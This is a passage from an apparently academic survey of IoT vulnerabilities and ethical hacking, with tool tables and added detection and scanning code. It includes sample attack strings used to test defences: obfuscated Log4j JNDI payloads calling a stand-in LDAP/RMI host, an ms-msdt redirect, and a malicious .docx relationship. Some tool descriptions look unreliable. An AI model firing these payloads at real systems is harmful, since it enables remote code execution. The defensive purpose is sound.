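            "verdict": verdict}


def build_sample_docx(target: str, external: bool = True) -> bytes:
    """Constructed minimal .docx used as sample input (not a real document)."""
    mode = ' TargetMode="External"' if external else ""
    rels = (f'<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId5" Type="{OLE_REL}" Target="{target}"{mode}/>'
            f'</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed sample HTML: only the scheme matters for the check.
SAMPLE_HTML = '<script>location.href = "ms-msdt:/id PCWDiagnostic";</script>'

if __name__ == "__main__":
    bad = build_sample_docx("http://203.0.113.10/RDF842l.html")   # placeholder URL
    good = build_sample_docx("embeddings/oleObject1.bin", external=False)
    print(triage(bad, SAMPLE_HTML))   # verdict: malicious
    print(triage(good))               # verdict: clean
```

The relationship check alone is a useful mail-gateway rule: legitimate documents almost never reference an OLE object by external URL, so an "external" target is worth quarantining even before the second stage is retrieved.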
In fact, it is also important to highlight the yearly increase in the number of cyber-attacks: according to CISCO's 2021 Cybersecurity Threat Trends report, (spear) phishing attacks were responsible for more than 80% of security incidents and 90% of data breaches, with phishing attacks increasing year-over-year by 400%. On the other hand, ransomware attacks increased by 48%, with a 17% increase between 2020 and 2021 [254,255].

4.2. Vulnerability assessment

Untested IoT systems tend to be more vulnerable to various types of attacks such as the ones presented above, which puts them at a higher risk of being targeted due to their exploitable security gaps. Therefore, it is important to assess vulnerabilities before specifying the risk(s) associated with them.

In order to evaluate a given vulnerability, it is highly recommended to assess it first, starting by identifying it. In Ref. [256], Votipka et al. were among the first to conduct a study and a comparative analysis of ethical hackers and pen testers. The analysis included the ways they scan for, find and discover vulnerabilities. The paper also covered how testers and hackers develop their own skills, knowledge and experience, as well as the tools they use. Moreover, the authors provided their own recommendations to support and improve security training for testers, along with better communication between ethical hackers and developers, where hackers were also encouraged to participate.

In fact, there is a huge number of tools for Vulnerability Assessment and Penetration Testing (VAPT) [257] that can be used to perform penetration testing and vulnerability assessment for ethical hacking purposes. Different papers mention various types of vulnerability assessment and penetration testing tools, such as [257,258]. However, we shall focus on the main VAPT tools, which are typically used during ethical hacking training.

Hence, Table 4 presents a summary of the most frequently used Vulnerability Assessment Penetration Testing (VAPT) and Network Vulnerability Scanning (NVS) tools used to secure IoT systems from exploits and protect them from attacks.

Table 4
Vulnerability Assessment Penetration Testing (VAPT) & Network Vulnerability Scanning (NVS) tools that can be employed on IoT entities (end devices with OS and/or servers), in addition to the user's desktop/mobile.

Name | Type | Description
--- | --- | ---
Kali Linux | VAPT/NVS | Collection of various different tools
Paros Proxy | VAPT | Web vulnerabilities scanner
Core Impact | VAPT | Vulnerability exploitation & scanning
Parrot Security OS | VAPT | Designed for vulnerability assessment and mitigation, penetration testing, computer forensics and anonymous web browsing
Nexpose | VAPT/NVS | Vulnerability scanner & vulnerability management life-cycle
Microsoft Baseline Security Analyzer (MBSA) | NVS | Identifies missing service packs, security patches and security misconfigurations; scans IP addresses, weak passwords, or SQL administrative vulnerabilities
Retina CS Community | NVS | Finds network vulnerabilities, configuration issues and missing patches; provides free scanning and patching for 256 IPs (max); supports vulnerability scanning in mobile devices, servers and web applications

4.2.1. IT security vulnerability

IT security (ITSec) vulnerabilities, once exploited, can deal a serious blow to both IoT systems and users/clients, since they target the confidentiality, integrity or/and availability of a given IoT system, which drastically affects its performance.

• Lack of Access Control Mechanisms: The lack of the right access control mechanisms can make any IoT system prone to various types of attacks and vulnerabilities. In many cases, employees are given access privileges beyond their intended task(s), and are left with these privileges even after their task(s) have been performed. In other cases, physical access control is another concern, since locks can be easily broken and keys can be easily obtained. Therefore, the adoption of biometric access control mechanisms [259,260] is important and deserves attention, especially since many biometric features can be imitated [261].

• Third-Party Applications: are usually untrusted or semi-trusted applications that are used for a specific task or to fix a given IoT system, such as debugging processes. Such applications can be rogue applications that are used to gain unauthorised access to the network, inject malicious code, or eavesdrop/spy on the transmitted messages to retrieve confidential information.

• Backdoor Programs: are typically set up by vendors for fast access to any given IoT system. However, they can also open the door for hackers who exploit them as a weakness to gain illegal covert access. In fact, hidden backdoors are intentionally created computer security vulnerabilities, which allow the covert installation of a program or the execution of given code to provide remote access to a system via the exploited device.

• Lack of Patching/Updates: Operating systems (OSs) must always be updated to patch the vulnerabilities present in older versions. Otherwise, they can be easily exploited. Recently this has proven to be a main vulnerability, as in the case of Log4j, which was and still is exploited on thousands of devices. This leaves not only OSs vulnerable, but also the systems and devices that rely or run on this platform, exposed to older as well as much newer exploits such as zero-day attacks [262]. Therefore, updating systems, devices and OSs is a must [263].

• Program Errors & Unknown System Bugs: these issues are usually caused by coding errors or software bugs, which can be exploited to install a given malware (mainly a Trojan or a worm) to establish access to a given device or for reconnaissance purposes. In fact, they can also be related to security, software or programming bugs, especially when different systems are communicating with each other. Such bugs are usually vulnerabilities that are exploited to gain or maintain access over a given system.

• Unknown System Vulnerabilities: are usually exploited by zero-day attacks, such as the recent case of Log4j (i.e. the CVE-2021-44228 and CVE-2021-45046 variants) [264] that caused a cyber-security flaw (December 2021), since such vulnerabilities are only known to the attacker and are very difficult to prevent. Hence the importance of adopting penetration testing.

• Hardware Vulnerability: is related to IoT hardware equipment that is fragile and not tamper-resistant, making it more prone to destruction, physical tampering, damage or damage beyond recovery. Other vulnerabilities may cause systems to overheat, melt down, burn down or even explode. Therefore, it is also important to check the quality of the hardware and hardware equipment in use, and to ensure that they will be used in a safe, secure and suitable environment.

• Poor IT Skills: are usually caused by the lack of training of IT security personnel who have limited experience and skills. Therefore, continuous training must be maintained to ensure a high level of readiness and a low risk of failure.

• Accidents: can be intentional, as the ones caused by rogue employees, or unintentional, due to a lack of employee training. The associated errors can be minor, but sometimes they can be major, causing the system to crash and thus affecting its availability. Hence, accountability must be enforced, while creating a team spirit among co-workers to avoid mistreatment and lack of performance.


• Lack of CERT: described as the lack of training that the IT security staff undergoes in order to become part of the "Computer Emergency Response Team" (CERT) [265]. In fact, it is highly recommended to address such a vulnerability and threat accurately, effectively, efficiently and on time.
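The Log4j entries above describe a flaw that is trivial to grep for in its plain form but that attackers wrapped in Log4j's own lookup syntax to slip past naive signatures. The following Python is an example added here (not code from the paper nor from a listed tool): it collapses nested ${lower:...}, ${upper:...} and ${...:-default} lookups approximately the way the Log4j 2 interpolator would, and only then matches the jndi: lookup, running over a few constructed web-server log lines (addresses are from documentation ranges).

```python
import re
from typing import Dict, List, Optional

# One innermost ${...} lookup (no nested braces inside).
INNER = re.compile(r"\$\{([^${}]*)\}")
# The dangerous lookup, matched only after obfuscation is collapsed.
JNDI_RE = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve(expr: str) -> Optional[str]:
    """Collapse one lookup as Log4j 2.x evaluates it, or None if it cannot.

    ${any:thing:-default} -> default     ${lower:J} -> j     ${upper:j} -> J
    ${jndi:...} is left in place so the outer match can find it. This is an
    approximation of the real StrSubstitutor, enough for the common evasions.
    """
    if ":-" in expr:
        return expr.rsplit(":-", 1)[1]
    low = expr.lower()
    if low.startswith("lower:"):
        return expr[6:].lower()
    if low.startswith("upper:"):
        return expr[6:].upper()
    return None


def normalize(s: str, max_rounds: int = 32) -> str:
    """Repeatedly rewrite innermost lookups until nothing more collapses."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = INNER.sub(repl, s)
        if not changed:
            break
    return s


def find_jndi(lines: List[str]) -> List[Dict[str, object]]:
    """Return 1-based line number and collapsed payload for every JNDI lookup."""
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        m = JNDI_RE.search(normalize(line))
        if m:
            hits.append({"line": n, "payload": m.group(0)})
    return hits


# Constructed sample access-log lines (not real traffic); line 5 is benign.
LOG_SAMPLE = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.7 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:ldap}://198.51.100.9:1389/b}"
203.0.113.8 - - [10/Dec/2021:14:02:17 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${env:NOPE:-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9:1099/c}"
203.0.113.9 - - [10/Dec/2021:14:02:19 +0000] "GET /x HTTP/1.1" 200 10 "-" "Price is ${price:-free} today"
"""

if __name__ == "__main__":
    for hit in find_jndi(LOG_SAMPLE.splitlines()):
        print(hit)
```

Matching after normalisation rather than on the raw line is the point: a rule that looks for the literal string "${jndi:" misses lines 3 and 4 entirely, while the collapsed form also gives the responder the real callback host to block.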

4.2.2. Technical & operational vulnerability

Operational vulnerabilities require constant scanning to assess their exploitable vulnerability level [266], as well as to detect and identify the Advanced Persistent Threat (APT) strategy [267]. However, it is important to identify and classify them first.

• System Privileges: admin privileges that are not properly assigned, exploited access controls, or unchanged defaults can also be misused and exploited, especially by insiders, or leaked by whistle-blowers.

• Resource-Constrained Devices: IoT devices with limited battery life, or that are resource-constrained in terms of memory and computational power, require a much more specialised, compatible software version in order to operate [268]. This also requires special security measures to be adopted so that active protection is ensured in a timely manner and without affecting their performance.

• Vendors Software: In many cases, vendors employ software without taking into consideration the security aspect of its design, especially when it is left unpatched or misconfigured [269]. Moreover, software is either employed with no security protection, or with very weak security protection, which compromises the software [270]. In fact, using sandboxing can be a good practice against an IoT system's poor configuration or misconfiguration [271].

• Untested Applications: Many applications remain untested and unevaluated with respect to their security and vulnerability levels. Therefore, these applications are left unevaluated without being deemed either secure or non-secure, leaving them prone to various attack types including surveillance attacks.

• Hardware Components: Many hardware components lack the necessary physical protection and security against any possible physical attack based on unauthorised access. Therefore, it is essential to protect servers and storage areas from any possible and unwanted physical access to prevent any physical/logical damage.

In brief, all these vulnerabilities are summarised in Fig. 6, along with their most suitable solution.

5. Ethical hacking

In an era where ethical hacking is gaining great fame and popularity, with increased adoption and application to test IoT security, it is important to identify its life-cycle. Moreover, the tools used in its life-cycle events must also be highlighted in order to know how the process proceeds.

5.1. Ethical hacking life-cycle

The ethical hacking life-cycle is closely similar to the normal hacking life-cycle, with only a slight difference based on the fact that ethical hackers aim to cause no harm nor damage to a given IoT server, system, device or domain, unlike black-hat hackers (see Fig. 7 and Fig. 8). In fact, it is further illustrated in Fig. 8.

• Reconnaissance: The reconnaissance phase is based on the use of the available processes and techniques that can be used either covertly or deliberately in order to gather information about IoT systems or/and users via open or less-secure IoT servers or/and ports through network mapping. This includes IoT-related details such as the Wi-Fi/network in use and the type of connected machines/devices, along with their software, hardware and Operating System (OS).

• Scanning: aims to discover any IoT-related security or/and vulnerability gap(s) that can be used to conduct the attack. This includes the search for open or/and unused open ports, live hosts, devices, systems and services, along with configuration/security vulnerabilities in firewalls, Intrusion Detection Systems/Intrusion Prevention Systems (IDS/IPS), as well as routers and switches [188,272].

• Gaining Access: is based on gaining unauthorised but simulated access to an IoT system, application, server or device. This is achieved by relying on various penetration testing tools and techniques to

Fig. 7. Proposed general taxonomy for ethical hacking process.


Fig. 8. Appliance of the hacking concept on IoT-related domains and components, where ethical hackers stop at gaining access.

virtually break into the system and bypass the security measures, thus targeting the authorisation or authentication of a given IoT system.

• Maintaining Access: Once access into a given IoT system, device or server is gained using tools [110], the system's resources can be exploited by seeking other commonly vulnerable devices [273,274].
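The Reconnaissance and Scanning phases above are where tools such as Nmap (Table 7) are normally used. The following Python is an example added here (not the paper's code and not a wrapper around any listed tool): it shows the core of a TCP connect scan with passive banner grabbing, which is enough to recognise the telnet and SSH greeters typical of embedded devices. Because a real target cannot ship with the text, the block starts two local listeners that imitate a BusyBox telnet prompt and a Dropbear SSH banner; the host, ports and banners are constructed stand-ins.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, List, Tuple


def probe_port(host: str, port: int, timeout: float = 1.0) -> Tuple[int, bool, str]:
    """TCP connect() probe. Returns (port, is_open, banner).

    Only services that speak first (telnet, SSH, FTP, SMTP) yield a banner;
    HTTP would need a request sent, which is left out to keep the probe passive.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256).decode("ascii", "replace").strip()
            except OSError:          # no greeting within the timeout
                banner = ""
            return port, True, banner
    except OSError:                  # refused, filtered (timeout) or unreachable
        return port, False, ""


def scan(host: str, ports: List[int], workers: int = 32,
         timeout: float = 1.0) -> Dict[int, str]:
    """Connect-scan the given ports in parallel; map open port -> banner."""
    with ThreadPoolExecutor(max_workers=workers) as ex:
        results = list(ex.map(lambda p: probe_port(host, p, timeout), ports))
    return {port: banner for port, is_open, banner in results if is_open}


def start_fake_service(banner: bytes) -> Tuple[socket.socket, int]:
    """Constructed local listener standing in for an IoT device's service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # kernel picks a free port
    srv.listen(8)
    port = srv.getsockname()[1]

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:             # listener shut down: stop the thread
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def stop_fake_service(srv: socket.socket) -> None:
    try:
        srv.shutdown(socket.SHUT_RDWR)   # wakes a blocked accept() on Linux
    except OSError:
        pass
    srv.close()


def demo() -> Tuple[Dict[int, str], int]:
    """Scan two fake services plus one closed port; return (open map, closed port)."""
    telnet_srv, telnet_port = start_fake_service(b"\r\nBusyBox v1.31.1 login: ")
    ssh_srv, ssh_port = start_fake_service(b"SSH-2.0-dropbear_2019.78\r\n")
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                       # nothing listens here now
    try:
        return scan("127.0.0.1", [telnet_port, ssh_port, closed_port]), closed_port
    finally:
        stop_fake_service(telnet_srv)
        stop_fake_service(ssh_srv)


if __name__ == "__main__":
    found, _ = demo()
    for port, banner in sorted(found.items()):
        print(f"{port}/tcp open  {banner!r}")
```

A connect scan completes the three-way handshake, so it is logged by the target and any IDS in between; that is acceptable in an authorised test and is exactly the trace a defender should expect to see during the Scanning phase. The banner is what turns a port number into a finding (a BusyBox login prompt on a consumer device is a default-credential candidate; an old Dropbear version maps to known CVEs).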

Table 5
Web-based Ethical Hacking tools that can be employed with the IoT Web-applications servers.

Tools | Definition | Description | Operating System(s) | Tasks | Type | Programming Language
--- | --- | --- | --- | --- | --- | ---
Acunetix | Web-based | Web Application Security Scanner | RedHat, Mac, Windows-based | End-to-end web security scanning | Commercial | C++
Netsparker | Web-based | Hacking Web Applications | Web-servers, application server-based | Accurate/automated application security tester | Commercial | JavaScript, Ajax
Sqlmap | Web-based | SQL Injection | CentOS, Red Hat, Linux, Windows-based | Detects and exploits SQL injection flaws | Open Source | Python
Nikto | Web-based | Web Server Scanning Tool | Unix, Mac, Linux, Windows-based | Hacks web servers, scans for dangerous files, suspicious/outdated versions | Open Source | Perl
Burp Suite | Web-based | Web Vulnerability Scanning | Mac, Linux, Windows-based | Web vulnerability scanner and web application security | Commercial | Java, Python, Ruby
OWASP ZAP | Web-based | Web Application Security Scanner | Mac, Linux, Windows-based | Hijacks sessions, manipulates passing traffic, tests the security of web applications | Open Source | Java
Recon-ng | Web-based | Web Reconnaissance Framework | Linux-based | Used for quick and efficient web-based reconnaissance | Open Source | Python
Invicti | Web-based | Web Application Security Scanner | Linux, Windows-based | Detects SQL Injection, XSS and other vulnerabilities | Commercial | C++
Fortify WebInspect | Web-based | Dynamic Application Security Testing | Web-servers, application server-based | Identifies security vulnerabilities, informs on vulnerability trending, compliance management, and risk oversight | Commercial | C/C++, C#, VB.NET, and ASP.NET
Sboxr | Web-based | Web Application Vulnerability Testing | Web-servers, application server-based | Customises security scanners, detects false positives/negatives | Open Source | Python, Ruby, C# or VB.NET
Uniscan | Web-based | Web Application Penetration Testing Tool | Linux-based | Performs stress test, web or server fingerprinting, dynamic or static test option | Open Source | Perl
Ping Utility | Web-based | Ping Service Scanner | Linux, Windows-based | Pings any IP or domain and gives their approximate geographical location | Open Source | HTML
OUILookup | Web-based | MAC Address Vendor Lookup Tool | Linux, Windows-based | Easy to use, allows partial MAC address search | Open Source | NodeJS, PHP, Python


• Security Reports: following the successful completion of the previous phases, a security report is presented to show the main system and personnel vulnerabilities and how they were exploited, or can be exploited, in each phase. Weak security measures and practices are also flagged and highlighted to encourage the adoption of more protective and proactive security solutions that reduce the risk of exposure to cyber-attacks. Risk and vulnerability assessment methods are also suggested to maintain or reduce risks to an acceptable level.

5.2. Ethical hacking tools

In order to achieve the intended ethical hacking cycle, different tools should be used so that ethical hackers can perform and conduct their simulated attack against any IoT system, server, application or device. Furthermore, Tables 5-8 present a summary of the most famous tools used for ethical hacking purposes. To further divide this, Ethical Hacking for IoT (EHIoT) can be adopted over different IoT parts, including:

1. Web-based: where EHIoT tools are used to scan web applications and web-servers to detect security gaps and vulnerabilities, to prevent their exploitation by malicious entities. The main tools are summarised in Table 5.
2. Cloud-based: where EHIoT tools are primarily used to track and trace attacks using forensics tools, and also to monitor performance issues and reduce security risks, while trying to re-ensure compliance and accountability. The main tools are presented in Table 6.
3. Network-based: where EHIoT tools are used to monitor and scan IoT networks for any security vulnerability or gap, as well as to test the strength of the password/encryption that is used to secure IoT communications/connections. The main tools are summarised in Table 7.
4. Application-based: where EHIoT tools are used to evaluate the security level of IoT applications, and to check whether they still perform well in case of an event taking place, while also adding the forensics part to retrieve artefacts in case of attacks. The main tools are summarised in Table 8.

5.3. Ethical hacking challenges

There are various challenges that surround the ethical hacking domain. In fact, it is very important to highlight them in order to identify the problem, verify the challenge and overcome both. These challenges are not limited to one or two aspects, but span various different aspects instead.

• Capability Challenges: Many challenges are related to the lack of experience and skills gained over time. In fact, there is a threshold difference between different ethical hacking teams [276]. Moreover, there is no standardised threshold that unifies the skills and experience of ethical hackers into a single capability and capacity. Therefore, some ethical hacking teams may have more skills, experience and knowledge than other groups when performing their penetration testing to secure an IoT system/device, along with the availability of much more sophisticated tools and kits.

• Capacity Challenges: Another challenge is performing the necessary penetration testing in order to evaluate the level of security and immunity of a given IoT system or organisation against cyber-attacks, especially in terms of risk management [277]. The capacity is bounded by the limited experienced manpower and the available resources used to perform the penetration testing technique(s) and attack(s). Therefore, this is another challenge that requires deeper focus and attention in order to be addressed.

• Cost Challenges: Performing a penetration testing attack is not cheap, but rather expensive. However, it is necessary to avoid the exploitation of any vulnerability or security gap [276]. In fact, penetration testing is divided into two main steps. The first requires the identification of already existing exploitable IoT vulnerabilities, which has a defined cost. The next step is based on the ability to offer security measures to further protect the IoT system, which also requires an additional cost.

• Legal Challenges: Many legal challenges also surround ethical hackers within the ethical hacking domain, especially when it is conducted against an IoT system or domain. In other terms, ethical hackers do not perform their penetration testing without signing a legal document such as a Non-Disclosure Agreement (NDA). This also requires notifying the required authorities so that their testing is not classified as a cyber-crime. In practice the document that matters most is the written authorisation defining the scope and rules of engagement; an NDA alone only covers confidentiality. Therefore, without signing the legal paperwork, ethical hackers risk being legally prosecuted and arrested [278]. This is due to the absence of a uniform/universal legal jurisdiction system to achieve unified mutual cooperation between pen testers and ethical hackers.

• Knowledge Challenges: Knowledge challenges are based on the ability of ethical hackers to perform their penetration testing against IoT's exploitable vulnerabilities and security gaps. This includes software bugs, misconfigurations or other bugs (e.g. hardware, configuration, or coding). However, their penetration testing and knowledge are limited to identifying and overcoming already existing attacks. In other terms, penetration testing is unable to detect new attacks such as zero-day attacks [279]. This is due to these attacks being based on exploiting a vulnerability that was not detected by the ethical hackers who were conducting their penetration testing. The same limitation applies to attacks the tester did not anticipate, such as the birthday attack [280,281]. Also, the presence of polymorphic malware [282] and of crypter services that keep changing their signature and behaviour patterns means that their identification and mitigation remains a serious challenge. This is all due to their ability to avoid and evade detection by intrusion detection systems, firewalls and anti-viruses.

• Data Management Challenges: especially when it comes to processing the intercepted data, which depends on its volume, size, type, compatibility, processing speed, homogeneous/heterogeneous nature, validation, consistency, trust and location, especially when ethical hackers are dealing with big data [283,284]. This also depends on data compatibility with the ethical hacking tools in use, to ensure that the collected data will not end up damaged, altered or modified in a way that damages the IoT system, server, application, etc., nor result in a further security breach or information/data leak.

Table 6
Cloud-based Ethical Hacking tools that can be employed with IoT-Cloud domains.

Tools | Definition | Description | Operating System(s) | Tasks | Type | Programming Language
--- | --- | --- | --- | --- | --- | ---
Intruder | Cloud-based | Cloud-based Finding | Cloud platforms | Finding/fixing vulnerabilities | Commercial | Python
LiveAction | Cloud-based | Powerful Network Forensics Software | Mac, Linux, Windows-based | Monitors performance issues and reduces security risks using Omnipeek | Commercial | C++
QualysGuard | Cloud-based | Scalable Online Hacking Tools | UNIX, Windows-based | Helps businesses streamline their security and compliance solutions | Commercial | Java


Table 7
Network-based Ethical Hacking tools that can be employed to detect vulnerability within IoT networks.

Tools | Definition | Description | Operating System(s) | Tasks | Type | Programming Language
--- | --- | --- | --- | --- | --- | ---
Nmap | Network-based | Network Vulnerability Scanner | OpenBSD, Solaris, Mac, Linux, Windows-based | Computer security/network management, network and port security scanner | Open Source | C, Python, Lua, C++
Aircrack-Ng | Network-based | Packet Sniffer/WiFi Cracker | BSD, Solaris, eComStation 2, Mac, Linux, Windows-based | Supports wireless network security and interface controllers | Open Source | C
Wireshark | Network-based | Data Packet Analyser | BSD, Mac, Linux, Windows-based | Analyses data packets, decrypts many protocols, performs live capture and offline analysis | Open Source | C
OpenVAS | Network-based | Open Vulnerability Assessment Scanner | Linux, Windows-based | Unauthenticated and authenticated testing, uses high-level and low-level internet/industrial protocols | Open Source | C
NetStumbler | Network-based | Wireless Networking Tool | Windows-based | Verifies network poor coverage, detects wireless interference/rogue access points | Open Source | C
Maltego | Server-based | Link Analysis and Data Mining Tool | Mac, Linux, Windows | Real-time data mining and information gathering | Commercial | Python
Ettercap | Network-based | Network Sniffing | BSD/Solaris/Mac, Linux, Windows-based | Network/host analysis, content filtering, live connections sniffing | Open Source | C
John the Ripper | Network-based | Password Cracking Tool | DOS/OpenVMS, Windows-based | Performs dictionary attacks, detects weak UNIX passwords | Open Source | C
Angry IP Scanner | Network-based | IP Scanner Tool | Mac, Linux, Windows-based | Scans IP addresses and ports on local networks and the Internet | Open Source | Java
HOIC | Network-based | Network Stress Testing Tool | Mac, Linux, Windows-based | Denial-of-service application, floods targeted systems with requests | Open Source | C#
L0phtCrack | Network-based | System Hacking Tool | Solaris, BSD, Linux, Windows-based | Deduces passwords, uses password hashes, searches for weak passwords | Commercial | C
NetBIOS | Network-based | Non-routable OSI Session Layer 5 Protocol | Linux, Windows-based | Reads/writes on remote systems, initiates DoS attacks | Open Source | C
The Hydra | Network-based | Fast Network Logon Password Cracking Tool | QNX, Mac, Linux-based | Password/username guessing, login credential cracking, targets specific ports | Open Source | C++
Security Event Manager | Network-based | Network Security Event Manager | Mac, Linux, Windows-based | Detects threats, monitors security policies, and protects networks | Commercial | C and C++
Traceroute NG | Network-based | Network Path Analyser Tool | ReactOS, Linux, Windows-based | Provides accurate analysis, allows continuous network probing | Open Source | TCL [275]
Kismet | Network-based | Wireless Network Scanner Tool | Mac, Linux, Windows-based | Identifies networks, collects packets and detects hidden/non-beaconing networks | Open Source | Python, C++
Zenmap | Network-based | Official Nmap Security Scanner Software | BSD, Mac, Linux, Windows-based | Tracks new hosts, new and existing downed services | Open Source | Python
SuperScan | Network-based | Network Mapper | FreeBSD, Unix, Linux, Windows-based | Scans TCP ports, resolves hostnames and views their response, performs ping and port scans | Open Source | Python, C#, Java and PHP
Hping/Hping3 | Network-based | Network Security Scanner | BSD, Solaris, Mac, Linux, Windows-based | Sends packets and displays target replies, handles packet body and size, used to transfer files, tests firewall rules, performs port scanning and network performance tests | Open Source | C/TCL
Fluxion | Network-based | Wireless Network Security Tool | Linux, Windows-based | Audits Access Point (AP) security, recovers Wi-Fi Protected Access (WPA/WPA2) keys, conducts Handshake Snooper and Captive Portal attacks | Open Source | Bash, Python
MAC lookup | Network-based | MAC Address Scanner | Android, Mac, Linux, Unix, Windows-based | Identifies the type of the device and the manufacturer, ensures real-time geographical location | Open Source | Python

Table 8
Application-based ethical hacking tools that can be employed to detect security vulnerabilities/gaps found within IoT entities (end devices with an OS, servers/fog), in addition to user desktops or mobiles.

Tools | Definition | Description | Operating System(s) | Tasks | Type | Programming Language
Metasploit | Application-based | Anti-forensic tool builder | Mac, Linux, Windows | Covering tracks/artefacts, provides remote machine testing, helps understand security vulnerabilities | Open source | Perl
Metasploit Pro | Application-based | Pen testing software | Mac, Linux, Windows | Develops and executes exploit code against remote machines, creates security testing tools | Commercial | Ruby
Kiuwan | Application-based | Code security | Unix, Mac, Linux, Windows | Reviews software source code to identify sources of vulnerabilities | Commercial | Java
SET | Application-based | Social Engineering Toolkit | Mac, Linux | Provides a phishing utility, performs social engineering activities | Open source | Python
njRAT | Application-based | RAT hacking tool | Linux, Windows | Gets remote access, registers keystrokes, steals passwords, activates the webcam | Commercial | Python
Sn1per | Application-based | Automated security vulnerability scanner | Linux, Windows | Duplicates sites for phishing and social engineering purposes | Open source | Ruby
Cain and Abel | Application-based | Password recovery tool | Windows | Sniffs networks, recovers MS Access passwords, and cracks encrypted ones | Open source | Visual C++
Hashcat | Application-based | Robust password cracking and ethical hacking tool | Mac, Linux, Windows | Recovers lost passwords and audits password security | Open source | OpenCL and C
RainbowCrack | Application-based | Password cracking and ethical hacking tool | Linux, Windows | Generates rainbow tables for password cracking, reducing the cracking time | Commercial | Python
IKECrack | Application-based | Authentication cracker tool | Mac, Linux, Windows | Performs brute-force/dictionary attacks, pre-shared-key analysis and cryptography tasks | Open source | C, Perl
Medusa | Application-based | Parallel password cracker tool | SunOS, BSD, Linux, Mac, Windows | Supports many services with remote authentication, performs thread-based parallel/brute-force testing | Open source | Python, Ruby

• Forensics Challenges: in many cases, the use of forensics and anti-forensics in the "covering tracks" phase is not taken into consideration, or is only lightly considered. This, in turn, makes it challenging for ethical hackers to complete the whole "hacking phase", and it also affects how a First Incident Responders Team (FIRT) would react and which forensic tools it needs in order to track and trace the attacker and counter the attacker's use of anti-forensic tools [285].
• Cloud Computing Challenges: cloud computing is one of the main challenges surrounding the ethical hacking domain [286], especially since, according to FinTech News, attacks against cloud computing increased by 630% between January and April 2020 [287]. These attacks included data breaches, malware injection, DoS, and account hijacking.

5.4. Ethical hacking issues

Ethical hacking has been prone to many different issues that surround this domain, especially when applied to IoT, starting with ethical hackers who lack the required skills, experience and knowledge [288]. There are also different ways of performing ethical hacking tests, each with its own advantages and drawbacks. However, there are more important issues that require attention first.

• Privacy: the privacy issue must be taken very seriously, especially when an IoT system's vulnerability is being exposed through a simulated penetration testing attack conducted by ethical hackers. Such a simulated attack mainly targets the privacy of the organisation, including its data, information, and users' privacy [289].
• Security: security issues are more related to the lack of experience, knowledge and skills within the ethical hacking team performing the penetration test [290]. They are also related to the weak security measures and access control mechanisms employed by a given organisation to protect itself from physical access attempt(s).
• Trust: trust issues are primarily related to fully trusting a third (possibly suspicious) party [291] in order to evaluate the IoT system's security level(s) [292]. In fact, performing penetration testing allows ethical hackers to learn everything about the organisation, including its exploitable vulnerabilities and available security gaps.
• Legal and Law Issues: legal issues are increasingly prominent, since ethical hackers need to perform a simulated cyber-attack and/or hacking which, in real cases, would be classified as a cyber-crime [293]. Therefore, signing a non-disclosure agreement to protect both sides is mandatory. Moreover, when performing simulated insider attacks, police, law enforcement and local authorities must be notified, so that if the organisation manages to capture an ethical hacker, there will be no prosecution(s) or arrest(s). This is another important issue that requires serious attention.
• Forensics: many ethical hackers lack the ability to use forensic tools and techniques to retrieve data from logs and audit trails in order to check for failed login attempt(s) or abnormal network behaviour. In some cases, ethical hackers rely on anti-forensic techniques to simulate an advanced attack that covers the attacker's track(s). This is done in order to check the ability of a given organisation to defend itself and to detect and locate the attacker. It is classified as another issue because most ethical hackers have little knowledge of the digital forensics domain [10,11,294], including cloud forensics [258], mobile/computer forensics [295], and web-application forensics [296], especially when these fields are linked to the IoT domain.
• Budget Constraints: budgets remain a challenge, since the budget limit is often insufficient to purchase a quality software package for use on different IoT devices.
• Compatibility Issues: compatibility remains a challenge, as it is still difficult to conduct ethical hacking tasks that require a specialised interface and hardware/software, and to locate/extract digital file systems from volatile/non-volatile computer memory. Having different manufacturers further raises compatibility issues.
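As an added illustration of the forensics issue above (example code written for this page, not from the paper or from any cited tool): the failed-login trail that a password-guessing tool such as Hydra or Medusa (Table 7) leaves in an SSH authentication log, and the two checks a first responder would run over it. The sshd message format, the host name, the addresses and the year used to complete the syslog timestamps are assumptions, and the log lines are constructed.

```python
"""Added example (not from the paper): spotting password guessing in sshd logs.
Everything below the imports (log format, host, addresses, year) is assumed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. Syslog carries no year, so one is supplied when parsing.
SAMPLE_LOG = """\
Mar 12 10:00:01 iot-gw sshd[812]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar 12 10:00:03 iot-gw sshd[812]: Failed password for root from 203.0.113.7 port 51236 ssh2
Mar 12 10:00:04 iot-gw sshd[812]: Failed password for invalid user admin from 203.0.113.7 port 51238 ssh2
Mar 12 10:00:06 iot-gw sshd[812]: Failed password for pi from 203.0.113.7 port 51240 ssh2
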